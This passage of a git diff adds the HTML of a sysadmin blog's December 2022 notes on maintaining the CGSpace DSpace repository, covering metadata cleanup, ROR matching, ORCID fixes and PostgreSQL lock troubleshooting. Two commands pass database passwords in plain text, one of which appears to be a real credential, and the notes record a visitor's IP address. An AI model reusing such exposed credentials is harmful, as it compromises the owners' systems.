+</ul>
+</li>
+<li>I found some items on CGSpace in Dinka, Ndogo, and Bari languages, but the <code>dcterms.language</code> field was &ldquo;other&rdquo;
+<ul>
+<li>That&rsquo;s so unfortunate! These languages are not in ISO 639-1, but they are in ISO 639-3, which uses Alpha 3 and has more space for languages</li>
+<li>I changed them from other to use the three-letter codes, and I will suggest to the CG Core group that we use ISO 639-3 in the future</li>
+</ul>
+</li>
+<li>Send feedback to Salem about some metadata issues with MEL submissions to CGSpace</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-12/index.html b/docs/2022-12/index.html
new file mode 100644
index 000000000..cc12a8cf4
--- /dev/null
+++ b/docs/2022-12/index.html
@@ -0,0 +1,631 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2022" />
+<meta property="og:description" content="2022-12-01
+
+Fix some incorrect regions on CGSpace
+
+I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions
+
+
+Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
+Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-12/" />
+<meta property="article:published_time" content="2022-12-01T08:52:36+03:00" />
+<meta property="article:modified_time" content="2023-01-01T10:12:13+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2022"/>
+<meta name="twitter:description" content="2022-12-01
+
+Fix some incorrect regions on CGSpace
+
+I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions
+
+
+Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
+Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-12/",
+  "wordCount": "2671",
+  "datePublished": "2022-12-01T08:52:36+03:00",
+  "dateModified": "2023-01-01T10:12:13+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-12/">
+
+    <title>December, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-12/">December, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-12-01T08:52:36+03:00">Thu Dec 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-12-01">2022-12-01</h2>
+<ul>
+<li>Fix some incorrect regions on CGSpace
+<ul>
+<li>I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions</li>
+</ul>
+</li>
+<li>Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!</li>
+<li>Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)</li>
+</ul>
+<ul>
+<li>CGSpace and PRMS information session with Enrico and a bunch of researchers</li>
+<li>I noticed some minor issues with SPDX licenses and AGROVOC terms in items submitted by TIP so I sent a message to Daniel from Alliance</li>
+<li>I startd a harvest on AReS since we&rsquo;ve updated so much metadata recently</li>
+</ul>
+<h2 id="2022-12-02">2022-12-02</h2>
+<ul>
+<li>File some issues related to metadata on the MEL issue tracker
+<ul>
+<li><a href="https://github.com/CodeObia/MEL/issues/11066">Only use &ldquo;Open Access&rdquo; or &ldquo;Limited Access&rdquo; access rights when publishing items on CGSpace</a></li>
+<li><a href="https://github.com/CodeObia/MEL/issues/11067">Set the description when submitting bitstreams to CGSpace</a></li>
+<li><a href="https://github.com/CodeObia/MEL/issues/11068">Some items have a Creative Commons license, but are Limited Access and bitstreams are locked</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-03">2022-12-03</h2>
+<ul>
+<li>I downloaded a fresh copy of CLARISA&rsquo;s institutions list as well as ROR&rsquo;s latest dump from 2022-12-01 to check how many are matching:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s https://api.clarisa.cgiar.org/api/institutions | json_pp &gt; ~/Downloads/2022-12-03-CLARISA-institutions.json
+</span></span><span style="display:flex;"><span>$ jq -r <span style="color:#e6db74">&#39;.[] | .name&#39;</span> ~/Downloads/2022-12-03-CLARISA-institutions.json &gt; ~/Downloads/2022-12-03-CLARISA-institutions.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i ~/Downloads/2022-12-03-CLARISA-institutions.txt -o /tmp/clarisa-ror-matches.csv -r v1.15-2022-12-01-ror-data.json
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/clarisa-ror-matches.csv | wc -l
+</span></span><span style="display:flex;"><span>1864
+</span></span><span style="display:flex;"><span>$ wc -l ~/Downloads/2022-12-03-CLARISA-institutions.txt
+</span></span><span style="display:flex;"><span>7060 /home/aorth/Downloads/2022-12-03-CLARISA-institutions.txt
+</span></span></code></pre></div><ul>
+<li>Out of the box they match 26.4%, but there are many institutions with multiple languages in the text value, as well as countries in parentheses so I think it could be higher</li>
+<li>If I replace the slashes and remove the countries at the end there are slightly more matches, around 29%:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sed -e <span style="color:#e6db74">&#39;s_ / _\n_&#39;</span> -e <span style="color:#e6db74">&#39;s_/_\n_&#39;</span> -e <span style="color:#e6db74">&#39;s/ \?(.*)$//&#39;</span> ~/Downloads/2022-12-03-CLARISA-institutions.txt &gt; ~/Downloads/2022-12-03-CLARISA-institutions-alan.txt
+</span></span></code></pre></div><ul>
+<li>I checked CGSpace&rsquo;s top 1,000 affiliations too, first exporting from PostgreSQL:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2022-11-22-affiliations.csv;
+</span></span></code></pre></div><ul>
+<li>Then cutting (tab is the default delimeter):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cut -f <span style="color:#ae81ff">1</span> /tmp/2022-11-22-affiliations.csv &gt; 2022-11-22-affiliations.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i 2022-11-22-affiliations.txt -o /tmp/cgspace-matches.csv -r v1.15-2022-12-01-ror-data.json
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/cgspace-matches.csv | wc -l
+</span></span><span style="display:flex;"><span>542
+</span></span></code></pre></div><ul>
+<li>So that&rsquo;s a 54% match for our top affiliations</li>
+<li>I realized we should actually check affiliations and sponsors, since those are stored in separate fields
+<ul>
+<li>When I add those the matches go down a bit to 45%</li>
+</ul>
+</li>
+<li>Oh man, I realized institutions like <code>Université d'Abomey Calavi</code> don&rsquo;t match in ROR because they are like this in the JSON:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#34;name&#34;: &#34;Universit\u00e9 d&#39;Abomey-Calavi&#34;
+</span></span></code></pre></div><ul>
+<li>So we likely match a bunch more than 50%&hellip;</li>
+<li>I exported a list of affiliations and donors from CGSpace for Peter to look over and send corrections</li>
+</ul>
+<h2 id="2022-12-05">2022-12-05</h2>
+<ul>
+<li>First day of PRMS technical workshop in Rome</li>
+<li>Last night I submitted a CSV import with changes to 1,500 Alliance items (adding regions) and it hadn&rsquo;t completed after twenty-four hours so I canceled it
+<ul>
+<li>Not sure if there is some rollback that will happen or what state the database will be in, so I will wait a few hours to see what happens before trying to modify those items again</li>
+<li>I started it again a few hours later with a subset of the items and 4GB of RAM instead of 2</li>
+<li>It completed successfully&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-07">2022-12-07</h2>
+<ul>
+<li>I found a bug in my csv-metadata-quality script regarding the regions
+<ul>
+<li>I was accidentally checking <code>cg.coverage.subregion</code> due to a sloppy regex</li>
+<li>This means I&rsquo;ve added a few thousand UN M.49 regions to the <code>cg.coverage.subregion</code> field in the last few days</li>
+<li>I had to extract them from CGSpace and delete them using <code>delete-metadata-values.py</code></li>
+</ul>
+</li>
+<li>My <a href="https://github.com/DSpace/DSpace/pull/8550">DSpace 7.x pull request to tell ImageMagick about the PDF CropBox</a> was merged</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-12-08">2022-12-08</h2>
+<ul>
+<li>While on the plane I decided to fix some ORCID identifiers, as I had seen some poorly formatted ones
+<ul>
+<li>I couldn&rsquo;t remember the XPath syntax so this was kinda ghetto:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xmllint --xpath <span style="color:#e6db74">&#39;//node/isComposedBy/node()&#39;</span> dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE <span style="color:#e6db74">&#39;label=&#34;.*&#34;&#39;</span> | sed -e <span style="color:#e6db74">&#39;s/label=&#34;//&#39;</span> -e <span style="color:#e6db74">&#39;s/&#34;$//&#39;</span> &gt; /tmp/orcid-names.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/update-orcids.py -i /tmp/orcid-names.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -m <span style="color:#ae81ff">247</span>
+</span></span></code></pre></div><ul>
+<li>After that there were still some poorly formatted ones that my script didn&rsquo;t fix, so perhaps these are new ones not in our list
+<ul>
+<li>I dumped them and combined with the existing ones to resolve later:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=247 AND text_value LIKE &#39;%http%&#39;) to /tmp/orcid-formatting.txt;
+</span></span><span style="display:flex;"><span>COPY 36
+</span></span></code></pre></div><ul>
+<li>I think there are really just some new ones&hellip;</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/orcid-formatting.txt| grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u &gt; /tmp/2022-12-08-orcids.txt 
+</span></span><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u | wc -l
+</span></span><span style="display:flex;"><span>1907
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2022-12-08-orcids.txt
+</span></span><span style="display:flex;"><span>1939 /tmp/2022-12-08-orcids.txt
+</span></span></code></pre></div><ul>
+<li>Then I applied these updates on CGSpace</li>
+<li>Maria mentioned that she was getting a lot more items in her daily subscription emails
+<ul>
+<li>I had a hunch it was related to me updating the <code>last_modified</code> timestamp after updating a bunch of countries, regions, etc in items</li>
+<li>Then today I noticed this option in <code>dspace.cfg</code>: <code>eperson.subscription.onlynew</code></li>
+<li>By default DSpace sends notifications for modified items too! I&rsquo;ve disabled it now&hellip;</li>
+</ul>
+</li>
+<li>I applied 498 fixes and two deletions to affiliations sent by Peter</li>
+<li>I applied 206 fixes and eighty-one deletions to donors sent by Peter</li>
+<li>I tried to figure out how to authenticate to the DSpace 7 REST API
+<ul>
+<li>First <a href="https://github.com/DSpace/RestContract/blob/main/csrf-tokens.md">you need a CSRF token</a>, before you can even try to authenticate</li>
+<li>Then you can authenticate, but I can&rsquo;t get it to work:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -v https://dspace7test.ilri.org/server/api
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>dspace-xsrf-token: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>$ curl -v -X POST --data <span style="color:#e6db74">&#34;user=aorth@omg.com&amp;password=myPassword&#34;</span> <span style="color:#e6db74">&#34;https://dspace7test.ilri.org/server/authn/login&#34;</span> -H <span style="color:#e6db74">&#34;X-XSRF-TOKEN: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4&#34;</span>
+</span></span></code></pre></div><ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-12-09">2022-12-09</h2>
+<ul>
+<li>I found a way to check the owner of a Handle prefix
+<ul>
+<li>You query the admin Handle for the prefix, ie: <a href="https://hdl.handle.net/0.na/10568">https://hdl.handle.net/0.na/10568</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-11">2022-12-11</h2>
+<ul>
+<li>I got LDAP authentication working on DSpace 7</li>
+</ul>
+<h2 id="2022-12-12">2022-12-12</h2>
+<ul>
+<li>Submit some issues to MEL GitHub:
+<ul>
+<li><a href="https://github.com/CodeObia/MEL/issues/11081">Links to https://mel.cgiar.org/dspace/limited for Limited Access items on CGSpace</a></li>
+<li><a href="https://github.com/CodeObia/MEL/issues/11083">Items submitted to CGSpace without Initiative</a></li>
+</ul>
+</li>
+<li>PRMS planning meeting before tomorrow&rsquo;s meeting with researchers and submitters</li>
+</ul>
+<h2 id="2022-12-13">2022-12-13</h2>
+<ul>
+<li>I made some minor changes to csv-metadata-quality
+<ul>
+<li>I switched to using the SPDX license data as a JSON directly from SPDX, instead of via the now-deprecated spdx-license-list package on pypi</li>
+</ul>
+</li>
+<li>I exported the Initiatives collection to tag missing regions</li>
+<li>I submitted an issue to MEL GitHub:
+<ul>
+<li><a href="https://github.com/CodeObia/MEL/issues/11084">Set the description of bitstreams in the THUMBNAIL bundle to &ldquo;IM Thumbnail&rdquo; when submitting to CGSpace</a></li>
+</ul>
+</li>
+<li>Submit a pull request to <a href="https://github.com/citizenlab/test-lists/pull/1199">fix the Handle link in the Citizen Lab test URLs for Iran</a>
+<ul>
+<li>I had originally submitted this in 2018, but it seems someone updated the URL in 2020&hellip; hmmm</li>
+</ul>
+</li>
+<li>I normalized the <code>text_lang</code> values on CGSpace again:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+</span></span><span style="display:flex;"><span> text_lang |  count  
+</span></span><span style="display:flex;"><span>-----------+---------
+</span></span><span style="display:flex;"><span> en_US     | 3050302
+</span></span><span style="display:flex;"><span> en        |     618
+</span></span><span style="display:flex;"><span>           |     605
+</span></span><span style="display:flex;"><span> fr        |       2
+</span></span><span style="display:flex;"><span> vi        |       2
+</span></span><span style="display:flex;"><span> es        |       1
+</span></span><span style="display:flex;"><span>           |       0
+</span></span><span style="display:flex;"><span>(7 rows)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>dspace=# BEGIN;
+</span></span><span style="display:flex;"><span>BEGIN
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;&#39;, NULL);
+</span></span><span style="display:flex;"><span>UPDATE 1223
+</span></span><span style="display:flex;"><span>dspace=# COMMIT;
+</span></span><span style="display:flex;"><span>COMMIT
+</span></span></code></pre></div><ul>
+<li>I wrote an initial version of a script to map CGSpace items to Initiative collections based on their <code>cg.contributor.initiative</code> metadata
+<ul>
+<li>I am still considering if I want to add a mode to <em>un-map</em> items that are mapped to collections, but do not have the corresponding metadata tag</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-14">2022-12-14</h2>
+<ul>
+<li>Lots of work on PRMS related metadata issues with CGSpace
+<ul>
+<li>We noticed that PRMS uses <code>cg.identifier.dataurl</code> for the FAIR score, but not <code>cg.identifier.url</code></li>
+<li>We don&rsquo;t use these consistently for datasets in CGSpace so I decided to move them to the dataurl field, but we will also ask the PRMS team to consider the normal URL field, as there are commonly other external resources related to the knowledge product there</li>
+</ul>
+</li>
+<li>I updated the <code>move-metadata-values.py</code> script to use the latest best practices from my other scripts and some of the helper functions from <code>util.py</code>
+<ul>
+<li>Then I exported a list of text values pointing to Dataverse instances from <code>cg.identifier.url</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= ☘ \COPY (SELECT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=219 AND (text_value LIKE &#39;%persistentId%&#39; OR text_value LIKE &#39;%20.500.11766.1/%&#39;)) to /tmp/data.txt;
+</span></span><span style="display:flex;"><span>COPY 61
+</span></span></code></pre></div><ul>
+<li>Then I moved them to <code>cg.identifier.dataurl</code> on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/move-metadata-values.py -i /tmp/data.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -f cg.identifier.url -t cg.identifier.dataurl
+</span></span></code></pre></div><ul>
+<li>I still need to add a note to the CGSpace submission form to inform submitters about the correct field for dataset URLs</li>
+<li>I finalized work on my new <code>fix-initiative-mappings.py</code> script
+<ul>
+<li>It has two modes:
+<ol>
+<li>Check item metadata to see which Initiatives are tagged and then map the item if it is not yet mapped to the corresponding Initiative collection</li>
+<li>Check item collections to see which Initiatives are mapped and then unmap the item if the corresponding Initiative metadata is missing</li>
+</ol>
+</li>
+<li>The second one is disabled by default until I can get more feedback from Abenet, Michael, and others</li>
+</ul>
+</li>
+<li>After I applied a handful of collection mappings I started a harvest on AReS</li>
+</ul>
+<h2 id="2022-12-15">2022-12-15</h2>
+<ul>
+<li>I did some metadata quality checks on the Initiatives collection, adding some missing regions and removing a few duplicate ones</li>
+</ul>
+<h2 id="2022-12-18">2022-12-18</h2>
+<ul>
+<li>Load on the server is a bit high
+<ul>
+<li>Looking at the nginx logs I see someone from the University of Chicago (128.135.98.29) is using RStudio Desktop to query and scrape CGSpace</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;RStudio Desktop&#39; /var/log/nginx/access.log
+5570
+</code></pre><ul>
+<li>RStudio is already in the ILRI bot overrides for DSpace so it shouldn&rsquo;t be causing any extra hits, but I&rsquo;ll put an HTTP 403 in the nginx config to tell the user to use the REST API</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-12-21">2022-12-21</h2>
+<ul>
+<li>I saw that load on CGSpace was over 20.0 for several hours
+<ul>
+<li>I saw there were some stuck locks in PostgreSQL:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>    948 dspaceApi
+</span></span><span style="display:flex;"><span>     30 dspaceCli
+</span></span><span style="display:flex;"><span>   1237 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>Ah, it&rsquo;s likely there is something stuck because I see the load high since yesterday at 6AM, which is 24 hours now:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/12/cpu-day.png" alt="CPU load day">
+<img src="/cgspace-notes/2022/12/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
+<ul>
+<li>I ran all updates and restarted the server</li>
+</ul>
+<h2 id="2022-12-22">2022-12-22</h2>
+<ul>
+<li>I exported the Initiatives collection to check the mappings
+<ul>
+<li>My <code>fix-initiative-mappings.py</code> script found six items that could be mapped to new collections based on metadata</li>
+<li>I am still not doing automatic <em>unmappings</em> though&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-23">2022-12-23</h2>
+<ul>
+<li>I exported the Initiatives collection to check the metadata quality
+<ul>
+<li>I fixed a few errors and missing regions using csv-metadata-quality</li>
+</ul>
+</li>
+<li>Abenet and Bizu noticed some strange characters in affiliations submitted by MEL
+<ul>
+<li>They appear like so in four items currently <code>Instituto Nacional de Investigaci�n y Tecnolog�a Agraria y Alimentaria, Spain</code></li>
+<li>I submitted <a href="https://github.com/CodeObia/MEL/issues/11108">an issue</a> on MEL&rsquo;s GitHub repository</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-24">2022-12-24</h2>
+<ul>
+<li>Export the ILRI community to try to see if there were any items with Initiative metadata that are not mapped to Initiative collections
+<ul>
+<li>I found about twenty&hellip;</li>
+<li>Then I did the same for the AICCRA community</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-25">2022-12-25</h2>
+<ul>
+<li>The load on the server is high and I see some seemingly stuck PostgreSQL locks from dspaceCli:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>     44 dspaceApi
+</span></span><span style="display:flex;"><span>     58 dspaceCli
+</span></span></code></pre></div><ul>
+<li><a href="https://jaketrent.com/post/find-kill-locks-postgres/">Looking into this more</a> I see the PIDs for the dspaceCli locks:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> pl.pid <span style="color:#66d9ef">FROM</span> pg_locks pl <span style="color:#66d9ef">LEFT</span> <span style="color:#66d9ef">JOIN</span> pg_stat_activity psa <span style="color:#66d9ef">ON</span> pl.pid <span style="color:#f92672">=</span> psa.pid <span style="color:#66d9ef">WHERE</span> psa.application_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;dspaceCli&#39;</span>
+</span></span></code></pre></div><ul>
+<li>And the SQL queries themselves:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres=# SELECT pid, state, usename, query, query_start 
+</span></span><span style="display:flex;"><span>FROM pg_stat_activity 
+</span></span><span style="display:flex;"><span>WHERE pid IN (
+</span></span><span style="display:flex;"><span>  SELECT pl.pid FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = &#39;dspaceCli&#39;
+</span></span><span style="display:flex;"><span>);
+</span></span></code></pre></div><ul>
+<li>For these fifty-eight locks there are only six queries running
+<ul>
+<li>Interestingly, they all started at either 04:00 or 05:00 this morning&hellip;</li>
+</ul>
+</li>
+<li>I canceled one using <code>SELECT pg_cancel_backend(1098749);</code> and then two of the other PIDs died, perhaps they were dependent?
+<ul>
+<li>Then I canceled the next one and the remaining ones died also</li>
+</ul>
+</li>
+<li>I exported the entire CGSpace and then ran the <code>fix-initiative-mappings.py</code> script, which found 124 items to be mapped
+<ul>
+<li>Getting only the items that have new mappings from the output file is currently tricky because you have to change the file to unix encoding, capture the diff output from the original, and re-add the column headers, but at least this makes the DSpace batch import have to check WAY fewer items</li>
+<li>For the record, I used grep to get only the new lines:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -xvFf /tmp/orig.csv /tmp/cgspace-mappings.csv &gt; /tmp/2022-12-25-fix-mappings.csv
+</span></span></code></pre></div><ul>
+<li>Then I imported to CGSpace, and will start an AReS harvest once its done
+<ul>
+<li>The import process was quick but it triggered a lot of Solr updates and I see locks rising from dspaceCli again</li>
